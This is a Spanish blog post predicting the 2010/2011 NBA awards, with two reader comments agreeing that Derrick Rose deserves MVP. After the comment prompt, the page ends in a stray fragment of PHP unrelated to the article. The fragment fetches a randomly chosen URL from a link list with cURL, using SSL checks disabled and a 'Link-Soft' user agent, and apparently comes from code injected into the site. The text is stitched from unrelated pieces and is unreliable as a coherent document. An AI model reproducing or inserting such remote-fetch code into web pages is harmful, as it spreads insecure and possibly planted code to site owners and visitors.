Prediciendo los premios de la 2010/2011

08 de April de 2011 por TheDeerHunter

Llega el final de la regular y pronto empezarán a llover los reconocimientos individuales propios de cada campaña. Aquí tenemos la insana costumbre de mojarnos en fútiles vaticinios de todo tipo y, aunque otros años nos haya pillado el toro, en éste nos anticipamos a la NBA para que puedan copiar nuestras elecciones. Es nuestro legendario espíritu altruista y didáctico el que nos mueve. Atentos, medios especializados, técnicos y demás electores acreditados. Tenéis la faena hecha.

DEFENSIVE PLAYER OF THE YEAR:

No había que ser adivino y no lo fuímos ninguno de los que pronosticamos que Dwight Howard iba a lograr su tercer DPY consecutivo. La inmensa mayoría del staff de TJNBA y de sus visitantes lo vaticinamos. Una pequeña parte vio un posible cambio de rol de “El Elegido” en Miami hacia esta dirección, pero en mucha menor proporción.

Ahora mismo las quinielas andan muy desequilibradas. Se habla de Garnett, Bogut, Hill y Deng como lejanos contendientes al premio pero en la práctica son nombres de relleno que nadie en su sano juicio puede tomar en serio para disputarle el premio a Supermán. Howard lo tiene todo para igualar y superar a otros grandes especialistas defensivos como Big Ben o Mutombo con 4 premios por cabeza. Uno cree que podría mirar de tú a tú a otros mitos de las épocas pre-premio, como Moses, Russell o Chamberlain. De entrada es el único tras Moses en registrar 1.000 rebotes y 100 tapones en 6 temporadas consecutivas. Malone lo hizo 7 veces seguidas.

ROOKIE OF THE YEAR:

En TJNBA vimos a principio de curso una igualdad entre Wall y Griffin que finalmente no ha sido para tanto. Los meses con Wall lesionado, su inconsistencia en el lanzamiento y el capazo de highlights y animaladas que nos ha regalado Griffin  todo el curso ha desequilibrado completamente la balanza.

Blake Griffin está a otro nivel y así lo hemos tenido que asumir durante el curso. Para no aburrir hemos llegado en ocasiones incluso a ignorarle en el premio del rookie diario en las crónicas. Es un all-star en toda regla y el único jugador de la liga capaz de promediar más de 20 puntos, 12 rebotes y 3 asistencias. Combina espectacularidad con eficacia y, sobre todo, se le ve capaz de cambiar una dinámica tan complicada como es la de los Clippers.

Al final Wall es un gran rookie y, sin duda, un futuro crack, pero se tendrá que conformar con haber sido el mejor rookie del año… después de Griffin. Esto técnicamente le debería convertir en el auténtico RoY de su camada, pero esas cosas no cuentan. Más allá del jugador de los Wizards finalmente hemos disfrutado de una interesante generación de novatos: Cousins, Monroe, Fields, Joe Crawford… van a ser fundamentales para sus equipos los próximos años.

COACH OF THE YEAR:

Uno de los premios más peculiares. Es casi imposible que alguien repita. Red Auerbach o Phil Jackson sólo tienen uno. Riley y Nelson son la excepción con 3 y 2 respectivamente, pero ellos no lo disputan este curso. Sería toda una sorpresa que ese aspecto no se tenga en cuenta este año.

Es una peculiaridad a la que en el blog no le dimos demasiada importancia a la hora de nombrar nuestros técnicos favoritos. Jackson, Rivers o Popovich aparecen destacados. Otros que no lo han sido y este año tampoco lo serán son Schiles y Adelman.

No lo creeréis, pero a diferencia de los medios especializados, la mayoría de nosotros apostó por “el novato” Tom Thibodeau como CoY. Parece claro que le reconocieron el inmenso trabajo que ejerció en los Celtics de los últimos años. Su sistema defensivo ha catapultado a los Bulls a la primera posición del Este y con posibilidades de alcanzar el mejor récord de la regular. Esas son sus sólidas credenciales como máximo favorito al premio.

Uno de los obstáculos que tendrá que superar es al propio Popovich, con un trabajo impresionante mutándose a si mismo para convertir a su equipo en uno de los más ofensivos. Sin embargo él ya lo tiene. Otros nombres que han sonado por el dulce sabor de boca que transmiten sus equipos son Doug Collins, Lionel Hollins y George Karl. Las posibilidades de los dos primeros son remotas, pero Karl podría ser el tapado de este premio. La gestión del trade del año y lo meritorio de su situación física, además de una trayectoria impresionante, tienen la culpa. Parece ser el segundo en liza con mucha menor distancia de lo que la mayoría de gente cree.

Por último debemos decir que es una gran mancha para la asociación y para el premio en si, que Sloan se haya retirado sin ningún galardón. Imperdonable. Quién sabe si todavía queda alguna sorpresa del viejo zorro. Por lo que insinúan algunos medios…

SIXTH MAN OF THE YEAR:

El premio en los últimos años valora especialmente a jugadores pseudo titulares o falsos titulares que suelen disfrutar de mayor cantidad de minutos que otros titulares nominales. La otra característica es que en rara ocasión se ha repetido el galardón. Tres únicas excepciones: McHale, Schrempf y Ricky Pierce que, obviamente, no se presentan este año.

Otra vez más tenemos que congratularnos de la visión de la mayor parte de participantes en nuestro blog. Lamar Odom fue el favorito, en esta ocasión más reñido con nombres curiosos: Reddick y Mike Miller. El segundo podría no haber estado muy desencaminado de no ser por las lesiones, el primero ha tenido un curso excesivamente irregular. Ninguno de los dos son candidatos.

De Odom podemos decir que es ahora mismo el principal favorito y es que no cabe duda que ha cuajado una excelente campaña. También hay que hacer notar que buena parte de su gran producción viene de disputar la mitad del curso como titular en el sentido más estricto del término, algo de lo que no pueden presumir ninguno de los otros contendientes como Jason Terry o Jamaal Crawford (que también lo han ganado). Eso sí, de 6º hombre literal, Odom también ha cumplido con creces como siempre se esperó de él.

Alguno de los tapados a disputarle el premio a Odom son Glen Davis, Thaddeus Young y… ¿porqué no? Marcin Gortat. Os juro que es un nombre que suena, aunque débilmente.

MOST IMPROVED PLAYER OF THE YEAR:

Lógicamente y por definición, aquí no ha repetido nadie nunca. Es un premio complejo y difícilmente predecible. Posiblemente el premio más difícil de adivinar a priori. Hay que tener mucha vista para cuantificar el progreso anual de alguien.

Y con todo no estuvimos nada desencaminados. El nombre de Kevin Love resonó en TJNBA en Octubre de este año, en dura pugna con Roy Hibbert. El segundo ha ido de más a menos y actualmente nadie le tiene en cuenta en las quinielas mientras que Love es de largo el máximo favorito a pesar de que suenan otros nombres tan consagrados como Lamarcus Aldridge o Russell Westbrook.

Si no estamos ante un espejismo nos encontramos ante un jugador de otra época. El mejor reboteador de la liga por encima del propio Howard y con una muñeca a tener en cuenta. Récord histórico de dobles-dobles con días en los que llegamos a creer que estábamos soñando. Una temporada inolvidable para él y para todos los que le hemos disfrutado.

Sólo le falla una cosa: sus compañeros.

MOST VALUABLE PLAYER OF THE YEAR:

El premio gordo, el premio más prestigioso pero también el más polémico. Existen tantos enfoques y tantos aspectos a tener en cuenta como opiniones. Hay quien valora la producción individual, la producción subjetiva, la ofensiva, el estado de forma, el balance del equipo, la trayectoria, quién lo ha ganado y quién no, el liderazgo, el carisma, la técnica, lo imprescindible que es, quién tiene de compañero en el equipo, la marca de zapatillas que gasta, el color de los ojos…  Todos los años sin excepción se habla de injusticias y de agravios comparativos. Diría que muchos son los que no lo ganaron y lo merecieron, pero entre los que lo ganaron, ¿existe alguno que no lo mereció?

Tras el traspaso de LeBron a Miami y su previsible cambio de papel nuestro favorito era Kevin Durant. El alero de los Thunder ha cumplido siendo el máximo anotador pero no ha llegado a deslumbrar como muchos esperábamos y eso se nota en las quinielas. Se puede decir que está fuera, en mayor o menor justicia. LeBron James no ha llegado a cambiar tanto de papel pero sí que ha evitado buscar abiertamente el premio. Aún con todo él sí sigue estando presente en las quinielas aunque no como favorito.

Gracias en gran parte a la extraordinaria trayectoria del equipo del que es líder, Derrick Rose es desde hace varias semanas el principal favorito, al menos para los grandes medios, que han llegado a ser acusados de realizar una campaña para su elección. Sería el jugador más joven de la historia en recibir el galardón. Recordemos que hace tan sólo dos años era elegido como RoY. Casi nadie lo podía esperar al principio de temporada y no lo hicimos nosotros.

Sin embargo, durante los últimos días el nombre de Dwight Howard resuena con mucha fuerza. Los argumentos son incontestables. Al contrario de lo que pueda parecer él es más importante en su equipo que Rose en los Bulls y, además, es un jugador prácticamente insustituible en toda la liga. ¿Es lícito hablar de la competencia en cada posición en este debate? Por supuesto, como muchos otros aspectos.

Otros aseguran con gran dosis de razón que Rose no es el mejor jugador de la actualidad. Por ahí vuelve a resonar el nombre de LeBron, o el de Kobe… incluso los de Nowitzki, Durant, Wade o Chris Paul. Palabras mayores, sin duda.

Con todo aquí venimos a mojarnos. Diría que el asunto es cosa de dos. Howard merece el MVP, pero por la importancia que se le da a las trayectorias de los equipos me da que Rose es quién lo va a ganar. Merecidamente también. ¿Vuelven los tiempos de vino y rosas en el mítico United Center?

We love this game!

Comenta

2 comentarios a esta entrada

  1. Len Bias dice:
    #1

    Ver jugar a Rose es una delicia y encima su equipo gana… por qué dudar de él? MVP!

    En cuanto al resto de premios, de acuerdo en casi todo con el blog: Howard, Thibodeau, Griffin, Love y Terry

      Citar

  2. Javijaen dice:
    #2

    Realmente el MVP siempre es polémico pero, este año, aunque Howard sea lo que es, si miramos a la clasificación vemos que en el Este quien reina son los Bulls por delante de unos buenos Celtics… Y en el Oeste son los Spurs los que mandan. Siendo el MVP sobre la liga regular, no veo mejor candidato en el Oeste y en los Bulls sí que Rose destaca muchísimo… Mejores credenciales imposible. Ahora por gusto los colores, si el premio quiere ser políticamente correcto pueden darselo a Howard, pero este año el que ha dado un paso adelante sobre todos los demás es Rose, en mi humilde opinión… Por cierto, si Knicks no consiguen el anillo (carcajadas generales) voy con Bulls, aunque no sé si en modo Playoff serán tan fuertes para vencer a Celtics o Magic. Pronto lo veremos…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>